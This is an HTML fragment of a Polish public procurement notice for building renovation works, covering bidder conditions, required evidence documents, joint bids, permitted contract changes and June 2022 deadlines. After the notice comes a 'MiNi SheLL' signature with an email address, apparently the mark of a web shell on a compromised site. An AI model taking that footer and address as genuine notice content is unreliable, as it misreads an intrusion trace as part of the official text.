class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu:<br/>1) dotyczące zdolności do występowania w obrocie gospodarczym:<br/> posiadają wpis do Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji<br/>o Działalności Gospodarczej.<br/>2) dotyczące posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z<br/>odrębnych przepisów: działalność zawodowa prowadzona na potrzeby wykonania przedmiotu zamówienia Zamawiający nie<br/>wymaga posiadania specjalnych kompetencji lub uprawnień.<br/>3) dotyczące sytuacji finansowej lub ekonomicznej: posiada środki finansowe lub posiada zdolność kredytową w wysokości<br/>co najmniej 150,00 PLN.<br/>4) dotyczące zdolności technicznej lub zawodowej:<br/>a) Wykonawca powinien wykazać, że w ciągu ostatnich 5 lat, a jeśli okres prowadzonej działalności jest krótszy to w tym<br/>okresie, wykonał roboty budowlane w obiektach kubaturowych o łącznej wartości co najmniej 200 000,00 zł brutto, w<br/>zakresie robót: gładzie, malowanie, zabudowy płytami gipsowo-kartonowymi, prace tynkarskie, murarskie, wykonanie<br/>przesklepień otworów drzwiowych i okiennych- nadproży w istniejącym obiekcie, z załączeniem dowodów określających, że<br/>roboty budowalne zostały wykonane należycie, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.<br/>Uwaga: Dot. warunków w pkt 3 i 4.<br/>W przypadku podania kwot w walutach obcych Zamawiający dokona ich przeliczenia według średniego kursu PLN w<br/>stosunku do walut obcych ogłaszanego przez NBP w dniu opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień<br/>Publicznych. Jeżeli w dniu opublikowania się ogłoszenia o zamówieniu, NBP nie opublikuje informacji o średnim kursie<br/>walut, Zamawiający dokona odpowiednich przeliczeń wg średniego kursu z pierwszego, kolejnego dnia, w którym NBP<br/>opublikuje ww. informacje.<br/>b) będzie dysponował w realizacji zamówienia osobami w specjalnościach:<br/>* Kierownik budowy – 1 osoba posiadająca kwalifikacje:<br/>- uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, w rozumieniu ustawy z dnia 7<br/>lipca 1994r. Prawo budowlane lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie<br/>wcześniej obowiązujących przepisów w zakresie wystarczającym do kierowania robotami; W przypadku Wykonawców<br/>zagranicznych – uprawnienia równoważne do kierowania robotami;<br/> co najmniej 3-letnie doświadczenie w kierowaniu robotami budowlanymi lub nadzorowaniu robót budowlanych,<br/>* Kierownik robót elektrycznych – 1 osoba posiadająca kwalifikacje:<br/>- uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń<br/>elektrycznych i elektroenergetycznych, w rozumieniu ustawy z dnia 7 lipca 1994r. Prawo budowlane lub odpowiadające im<br/>ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów w zakresie<br/>wystarczającym do kierowania robotami; W przypadku Wykonawców zagranicznych – uprawnienia równoważne do<br/>kierowania robotami;<br/> co najmniej 3-letnie doświadczenie w kierowaniu robotami budowlanymi lub nadzorowaniu robót elektrycznych,<br/>Uwaga:<br/>Warunkiem udziału w postępowaniu jest określony staż kierownika budowy i kierownika robót, który będzie obliczany bez<br/>uwzględniania liczby zadań wykonywanych w tym samym czasie. Bez znaczenia, z punktu widzenia okresu doświadczenia,<br/>jest fakt, że w niektórych miesiącach dana osoba pełniła funkcję przy realizacji dwóch inwestycji, ponieważ nie można<br/>podwójnie wliczać tych okresów do okresu doświadczenia (sygn. akt UZP/DKUE/KU/11/11 Prezesa UZP). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.1. Do oferty Wykonawca zobowiązany jest załączyć aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania - stanowiące załącznik nr 2 do SWZ. <br/>1.2. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału.<br/>1.3. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w ust. 1.1, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/><br/>2. Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, wymaganych w ogłoszeniu o zamówieniu lub SWZ, aktualnych na dzień ich złożenia wymienionych poniżej:<br/><br/>2.1. potwierdzających brak podstaw do wykluczenia:<br/>1)	oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów ( t.j. Dz. U. z 2020 r. poz. 1076) z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenie o przynależności do tej samej grupy kapitałowej warz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej;<br/>2)	zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, w zakresie art. 108 ust.1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że przed upływem terminu składania ofert Wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>3)	zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Z-du Ubezpieczeń Społecznych lub właściwego oddziału regionalnej lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenie społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że przed upływem terminu składania ofert Wykonawca dokonał płatności należnych składek na ubezpieczenie społeczne lub zdrowotne wraz z odsetkami lub grzywnami, lub zawarł porozumienie w sprawie spłat tych należności;<br/>4)	odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>5)	oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych w art. 108 ust. 1 pkt 3-6 i art. 109 ust. 1 pkt 1 Pzp.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.1. Do oferty Wykonawca zobowiązany jest załączyć aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania - stanowiące załącznik nr 2 do SWZ. <br/>1.2. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału.<br/>1.3. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w ust. 1.1, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/><br/>2. Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, wymaganych w ogłoszeniu o zamówieniu lub SWZ, aktualnych na dzień ich złożenia wymienionych poniżej:2.2. potwierdzających spełnienie warunków:<br/>1) dotyczących zdolności do występowania w obrocie gospodarczym:<br/>	dokument, o którym mowa w ust. 2.1 pkt 4<br/><br/>2) dotyczących sytuacji ekonomicznej lub finansowej: informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy w wymaganej wysokości, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem.<br/>* Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć wymaganych przez Zamawiającego podmiotowych środków dowodowych, dotyczących sytuacji ekonomicznej lub finansowej, Wykonawca składa inne podmiotowe środki dowodowe, które w wystarczający sposób potwierdzają spełnianie warunku udziału w postępowaniu.<br/><br/>3) dotyczących zdolności technicznej lub zawodowej: <br/>a)	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie. Dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne dokumenty;<br/>b)	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacja o podstawie do dysponowania tymi osobami;<br/><br/>Wzory ww. wykazów zamawiający prześle wykonawcy, którego oferta zostanie oceniona najwyżej wraz z wezwaniem , o którym mowa w ust. 2.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo powinno być załączone do oferty.<br/>2. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.<br/>3. Oświadczenie, o którym mowa w rozdz. X ust. 1.2 SWZ, składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>4. W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, o których mowa w art. 117 Pzp warunek udziału o którym mowa w rozdz. VII ust. 2 pkt 4) jest spełniony jeżeli Wykonawca, ubiegający się o zamówienia wspólnie z innymi wykonawcami, i który dostarcza potencjał na potrzeby spełnienia warunku udziału w postępowaniu w zakresie wykształcenia, kwalifikacji zawodowych lub doświadczenia, ma obowiązek osobiście wykonać tę część zamówienia, dla której te zdolności są wymagane. <br/>5. W przypadkach, o których mowa w ust. 4, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>6. Zamawiający w stosunku do Wykonawców ubiegających się o zamówienie, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej - dopuszcza łączne spełnienie warunku przez Wykonawców.<br/>7. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwość wprowadzenia zmiany umowy w następujących okolicznościach:<br/>1)	zmiany wysokości podatku VAT, jeżeli w okresie obowiązywania umowy nastąpi zmiana przepisów podatkowych,<br/>2)	zmiany lub rezygnacji z podwykonawcy dotycząca podmiotu, na którego zasoby Wykonawca powoływał się na zasadach określonych w art. 118, w celu wykazania spełniania warunków udziału w postępowaniu, Wykonawca jest obowiązany wykazać Zamawiającemu, że proponowany inny Podwykonawca lub Wykonawca samodzielnie spełnia warunki w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia publicznego, <br/>3)	zmiany terminu realizacji umowy z powodu:<br/>a)	wystąpienia siły wyższej określonej w umowie, <br/>b)	przyspieszenia ukończenia robót lub usprawnienie procesu budowlanego,<br/>c)	wystąpienia warunków atmosferycznych uniemożliwiających prowadzenie robót budowlanych zgodnie ze specyfikacją techniczną, wiedzą i sztuką budowlaną lub uniemożliwiających przeprowadzenie prób i sprawdzeń, <br/>d)	okoliczności niezawinionych przez Wykonawcę, w tym konieczności usunięcia błędów lub wprowadzenia zmian dokumentacji projektowej, <br/>e)	nadzwyczajnych warunków nieprzewidzianych w SWZ jak: niewypały i niewybuchy, wykopaliska archeologiczne;<br/>f)	konieczność wykonania robót zamiennych, dodatkowych;<br/>g)	inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy, skutkujące niemożliwością prowadzenia prac lub wykonywania innych czynności przewidzianych umową,<br/>4)	zmiany parametrów technicznych przedmiotu umowy, które nie wymagają zmiany udzielonego zezwolenia /zgłoszenia i nie wykraczają poza przedmiot określony w specyfikacji warunków zamówienia,<br/>5)	zmiany wynagrodzenia z powodu konieczności zrealizowania przedmiotu zamówienia przy zastosowaniu innych rozwiązań technicznych/ technologicznych niż wskazane w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy,<br/>6)	zmiany uzasadnione okolicznościami o których mowa w art. 357 (1) Kodeksu Cywilnego,<br/>7)	istotne zmiany uzasadnione okolicznościami, za które Wykonawca nie ponosi żadnej odpowiedzialności - na jego wniosek,<br/>8)	w przypadku wystąpienia okoliczności wstrzymania prowadzonej inwestycji przez czynniki zewnętrzne (np. inne niezależne budowy),<br/>9)	jeżeli konieczność wprowadzenia takiej zmiany wynika z okoliczności, których nie można było przewidzieć w ogłoszeniu o zamówieniu lub SWZ, mimo zachowania należytej staranności przez Zamawiającego,<br/>10)	zmiany osoby, przy pomocy której Wykonawca realizuje przedmiot umowy na inne spełniające warunki określone w specyfikacji warunków zamówienia. Zmiana jest możliwa na osobę spełniającą wymogi SWZ, a dla dokonania zmiany niezbędne jest uzyskanie zgody Zamawiającego na zaproponowaną osobę,<br/>11)	zmiany sposobu realizacji umowy w sytuacji zmian przepisów prawa lub pojawienia się nowych interpretacji i wytycznych z zakresu ochrony danych osobowych.<br/>Pozostałe zmiany określone we wzorze umowy – załącznik nr 4 do SWZ.<br/>2. W sprawach nieuregulowanych zastosowanie mają przepisy ustawy Prawo zamówień publicznych oraz Kodeks cywilny. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-20 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę z wymaganymi dokumentami należy złożyć za pośrednictwem Platformy zakupowej pod adresem: https://ugb.ezamawiajacy.pl w zakładce „OFERTY&#34; (zgodnie z instrukcją określoną w rozdziale XII SWZ) do dnia 20.06.2022r. do godz.12:00</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-20 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-19</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com